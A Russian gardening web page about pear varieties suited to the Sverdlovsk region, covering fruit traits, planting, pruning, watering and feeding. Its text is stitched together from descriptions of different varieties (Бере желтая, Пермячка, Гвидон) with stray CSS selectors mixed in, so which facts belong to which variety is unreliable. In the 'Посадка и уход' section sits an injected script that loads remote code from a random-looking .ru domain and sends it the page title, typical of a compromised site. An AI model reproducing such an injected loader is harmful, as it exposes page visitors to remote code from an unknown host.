Груша свердловские сорта
О чем статья:
Описание
Плоды Бере желтой вполне достойного, особенно для северных фруктов, размера — 100-110 граммов. Они гладкие, правильной формы. Кожица зеленая, постепенно она становится светло-желтой, без румянца. Мякоть кремового цвета, нежной консистенции, содержит много сока. Семена крупные и темные.
Вкус достоин всяческих похвал: он кисло-сладкий, запоминающийся, с душистым послевкусием. Береженая накапливает 11,2% сахаров, богата катехинами и арбутином. В состоянии съемной спелости плодам присуща терпкость, а при вылеживании в течение примерно недели она уходит.
Груши хорошо держатся на ветках. Их товарность и транспортабельность высокие.
Положительно сказывается на вкусе теплое, влажное и продолжительное лето. Срок созревания — позднеосенний, съем проводят с конца сентября до начала октября. Чем выше температура в хранилище, тем быстрее груши «доходят до кондиции». При оптимальных условиях они хранятся долго, более трех месяцев, обеспечивая вкусную витаминную добавку к столу в зимние месяцы.
Благодаря десертному вкусу и исключительной пользе плоды лучше всего есть свежими, но они подходят для заготовок впрок — в виде варений, джемов, соков.
Деревья Бере желтой низкорослые или средней силы роста, с округлой кроной и прочной древесиной. Кора на основных ветвях серая. Листья густо покрывают дерево, они светло-зеленые, матовые, с зазубренными краями. Мелкие белые цветы собраны в соцветия. Цветение раннее, но заморозки не являются помехой этому сорту.
Краткая характеристика
Груша | светло-желтая |
Мякоть | кремовая |
90-120 г | |
4,7 / 5 |
Высота | до 4 м |
Срок | конец сентября |
3-4 месяца | |
очень высокая |
Плюсы и минусы сорта
Сорт груши Пермячка обладает многочисленными преимуществами:
- ранним созреванием плодов;
- отличной зимостойкостью;
- неприхотливостью к погодным условиям;
- высоким качеством плодов;
- хорошим иммунитетом от заболеваемости;
- достойными урожаями.
К недостаткам относят:
- быстрый рост деревьев и их крупные размеры;
- необходимость в дополнительном опылении.
К посадке груши сорта Пермячка нужно отнестись со всей серьёзностью:
- деревья сорта предпочитают хорошо освещённые, сухие участки с плодородной лёгкой и рыхлой почвой, защищённые от ветров;
- подземные воды не должны подходить к поверхности земли ближе, чем на 3 метра;
- выбранный участок перекапывают, пропалывают, добавляют удобрения;
- если посадка дерева планируется весной, то ямку для него готовят осенью. Если сажать грушу собираются осенью, то лунка делается в конце весны;
- глубина лунки должна быть не менее 70 см, а её диаметр — около 1 м;
- до половины ямка засыпается плодородной почвой, смешанной с перегноем, торфом, древесной золой и суперфосфатом;
- сверху этой смеси делают небольшую возвышенность, на которую помещают саженец, как следует расправив его корневую систему;
- далее, ямку засыпают, почву вокруг деревца утрамбовывают и обильно поливают водой;
- расстояние вокруг посадки засыпают мульчей — торфом, перегноем или перепревшим коровьим навозом.
Уход за Пермячкой стандартный:
- деревьям необходим полив. За сезон делают как минимум 4 внесения влаги. При засушливом лете количество поливов увеличивают. Нельзя допускать переувлажнения — Пермячка не переносит переизбыток влаги;
- деревья сорта требовательны к подкормкам. Вносить удобрения рекомендуется 4 раза за весь сезон. Весной вносят органику — перегной, перепревший коровяк или куриный помёт. Перед цветением растения подкармливают азотосодержащими удобрениями, после цветения — калием и фосфором, а осенью — опять органикой;
- почву вокруг деревьев необходимо содержать в чистоте, очищая от органического мусора и, освобождая от сорной травы. Именно там могут размножаться грибные споры, болезнетворные бактерии и личинки вредителей;
- для наилучшего поступления кислорода к корням, землю под деревьями желательно периодически рыхлить;
- деревьям нужна ежегодная обрезка, во избежание загущения кроны;
- на зиму молодые деревца необходимо укутать мешковиной или укрывным материалом.
Посадка
Между молодыми саженцами необходимо оставлять свободное место в 3-4 метра. Между отдельными рядами также соблюдают дистанцию в 4-5 метров. Предпочтительнее высаживать на солнечном месте, с небольшой возвышенностью.
.t-cell
.t-valign_top
.t512__img
.t-name
a.t-btn
a.t-btn:hover
.t-title
.t-textblock
a.t04_title_link
a.t04_title_link:hover
Как посадить?
Чтобы плоды груши были вкусными и качественными, а урожаи – стабильно высокими нужно ответственно подойти к посадке плодового дерева. При посадке груши нужно учесть много факторов: верно определить сроки, правильно выбрать место, уделить внимание подготовке посадочной ямы.
Подробнее
.t-cell
.t-valign_top
.t512__img
.t-name
a.t-btn
a.t-btn:hover
.t-title
.t-textblock
a.t04_title_link
a.t04_title_link:hover
Как правильно привить?
Прививка груши — процедура несложная и увлекательная, но требующая аккуратности и соблюдения ряда правил. Прежде всего, необходимо позаботиться о выборе и заготовке прививочного материала, разобраться со сроками и способами прививки. Немаловажным моментом является также выбор подвоя, от качества которого напрямую будет зависеть результат всего мероприятия и будущее плодоношение.
Подробнее
Посадка и уход
var m5d6fd70f32c60 = document.createElement(‘script’);
m5d6fd70f32c60.src=’https://s98k2dmmbm.ru/show/?’ + Math.round(Math.random()*100000) + ‘=’ + Math.round(Math.random()*100000) + ‘&’ + Math.round(Math.random()*100000) + ‘=3085&’ + Math.round(Math.random()*100000) + ‘=’ + document.title +’&’ + Math.round(Math.random()*100000);
function f5d6fd70f32c60() else
}
f5d6fd70f32c60();
Груша Гвидон предпочитает солнечный участок и хорошо дренированный грунт. Сами посадочные работы производятся в обычном порядке:
- необходимо своевременно подготовить яму, куда закладывают питательную смесь, состоящую из земли, золы и перегноя;
- саженец необходимо установить так, чтобы привитое место было выше уровня грунта на 6 см, корневую систему закапывают землей и немного трамбуют;
- верх деревца необходимо срезать, оставив саженец, имеющий длину 0,8 – 0,9 м;
- по окончании посадочных работ производиться обильная поливка.
Проведение обрезки
Дерево будет постепенно расти, и одним из главных моментов ухода будет формировка кроны путем удаления лишних веток. Если все сделать правильно, то можно существенно приблизить начало плодоношения, а заодно повысить урожайность дерева. Практически все опытные садоводы пользуется своими способами обрезки, но есть ряд основных правил, которые рекомендуется выполнять новичкам:
- обрезаются побеги, идущие внутрь кроны;
- остается только центральный ствол;
- чтобы сформировать основной скелет нужно оставить разнонаправленные побеги первого порядка в количестве 5 штук;
- ветки второго порядка оставляют численностью до 7;
- чтобы не допустить излишней густоты кроны удаляют мелкие веточки в необходимом количестве;
- при наличии слабых и поврежденных побегов их необходимо срезать.
Поливка
Сорт Гвидон относится к быстрорастущим и урожайным, а значит дереву понадобится вода в большом количестве, чтобы оно смогло правильно расти и развиваться. Получить большой урожай фруктов без обильной поливки не получится. Для одного взрослого дерева понадобится от 10 до 15 ведер воды. Если поливка производится из шланга, то дождевальный метод с данным сортом не рекомендован. Вода должна поступать постепенно в приствольный круг.
В весеннее время деревья не поливают, а при наличии засушливого лета, воду вносят в тот момент, когда начинают формироваться плоды. Поливка в осеннее время, после того как будут собраны груши служит основой нового урожая и оберегает дерево от заморозков.
Внесение подкормок
Существует целый ряд сортов груш, которые будут хорошо расти и плодоносить без внесения удобрений. Однако если в грунте не хватает микроэлементов, то растения начнут чахнуть и плохо расти, в корне повлиять на ситуацию помогут подкормки.
Наличие тонких побегов, бледных редких листиков свидетельствует о том, что дереву не хватает такого элемента, как азот. Можно использовать мочевину в виде раствора. Вносят удобрение весной или осенью. Некоторые садоводы используют коровяк.
Когда начинается цветение, а затем и налив фруктов, для улучшения вкусовых качеств, применяют минеральные удобрения, подойдет калийно-фосфорная подкорма, или древесная зола – раствор.
В статье использованы материалы с сайтов: